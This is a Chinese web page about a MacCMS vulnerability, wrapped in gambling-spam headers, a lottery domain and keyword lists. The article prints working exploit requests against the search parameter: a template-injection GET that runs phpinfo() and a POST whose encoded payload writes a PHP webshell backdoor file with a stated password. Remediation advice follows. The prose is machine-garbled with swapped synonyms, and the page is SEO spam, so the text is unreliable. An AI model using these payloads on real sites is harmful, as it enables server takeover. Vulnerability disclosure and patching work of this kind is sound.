13186439127
上海时时乐定胆
您的當前位置:上海时时乐定胆 > 新聞資訊 > 建站經驗 >

上海时时乐开奖jieg:「西藏seo」蘋果cms網站漏洞修復解決辦法

上海时时乐定胆 www.ooxrm.icu 來源:小關工作室 時間:2019-04-25 瀏覽量:

蘋果cms體系,是現在許多影戲網站都在利用的一套網站體系,開源,免費,擴展性較好,支持一鍵收羅,偽靜態化,高并發的同時承載,得到的許多站長的喜好,于克日被網站寧靜檢測發明,maccms存在網站毛病,sql注入盲射獲取數據庫的治理員賬號暗碼,關于該毛病的詳情,我們細致闡發看下.

maccms毛病闡發與修復

蘋果CMS接納的是php語言開辟的代碼,利用的數據庫是mysql范例,這種架構是比力常用的,也是比力穩固的,但是在寧靜方面出現的題目是比力多的,這次發明的是sql注入毛病,在網站的根目次下的inc文件里的module目次下的vod.php代碼如下圖所示:

代碼里的empty($wd函數,在舉行判定假如是,大概不是的邏輯歷程當中,會將前段用戶訪問帶來的參數,舉行寧靜過濾,我們跟進代碼來追尋到蘋果CMS的設置文件,在function.php設置文件代碼李看到對網站的全部哀求方法包羅get、post、cookies的提交方法都逼迫性的舉行了寧靜轉義。網站毛病題目的產生就在這里.

我們細致又發明,maccms利用了360寧靜提供的防備sql注入攔截代碼。360的防備sql注入是好幾年前開辟,并公然在網絡上的,已經好久沒有更新維護了而且還存在sql注入代碼繞過的環境,參數值之間舉行實體轉換的時間,360的sql攔截規矩沒有對空缺符以及反斜杠舉行攔截,導致可以繞過插入惡意參數,直接哀求到蘋果cms后端數據庫中去,獲取蘋果CMS的治理員賬號暗碼。

我們來看下怎樣使用蘋果CMS的毛病,從上面毛病產生的細節里可以看出,是由于攔截sql注入語句的歷程中存在可以被繞過的毛病。我們來利用%0b,以及空格對代碼舉行注入,sql語句在拼接中,可以插入反斜杠舉行單引號的報錯,從而繞過蘋果CMS的寧靜攔截。語句如下:

GET哀求:

//127.0.0.1/index.PHP?m=vod-search&wd={if-A:phpinfo()}{endif-A}

可以直接看php的詳細信息

POST哀求

可以直接獲取webshell

//127.0.0.1/index.PHP?m=vod-search

POST內容如下:

wd={if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

可以直接天生帶有一句話木馬后門的代碼,文件名為safe.php,一句話木馬鏈接暗碼是safe.

怎樣修復蘋果cms網站毛病呢?

對網站毛病的修復我們要知道毛病產生的緣故原由,以及為何會繞過蘋果CMS的寧靜過濾,maccms利用的addslash寧靜函數,sql中沒有加單引號的寧靜防護,in字句也很輕易忘記加引號,再一個后期處置懲罰寧靜過濾的時間可以插入單引號,stripslash導致可以參加單引號,編解碼導致繞過addslash,利用urldecode編碼舉行注入繞過,憑據上面提出的毛病繞過,我們SINE寧靜提出毛病修復的發起是:對URL解碼舉行雙層的轉義,對get,post,cookies的攔截規矩舉行寧靜更新,增強空格,以及百分標記的攔截,假如對步伐代碼不認識的話發起咨詢專業的網站寧靜公司來處置懲罰辦理。

技術支持:商丘網站建設Copyright © 2013 - 2020 小關工作室 版權所有豫ICP備17039955號

博彩拉人技巧 北京pk10稳赚技巧玩法 七星彩稳头孢三字定数据 重庆时时历史开奖记录 竞彩足球稳赚不赔方法 6狮娱乐 最精准专家双色球荐号 逍遥森林舞会单机下载 七星彩稳赚法 斗牛看四张牌抢庄辅助 怎样玩彩票稳赚不赔 抢庄牌九外挂 2019中国女篮最新决赛 同城游戏手机版下载 快3必中计划软件购买 pk10玩法及中奖规则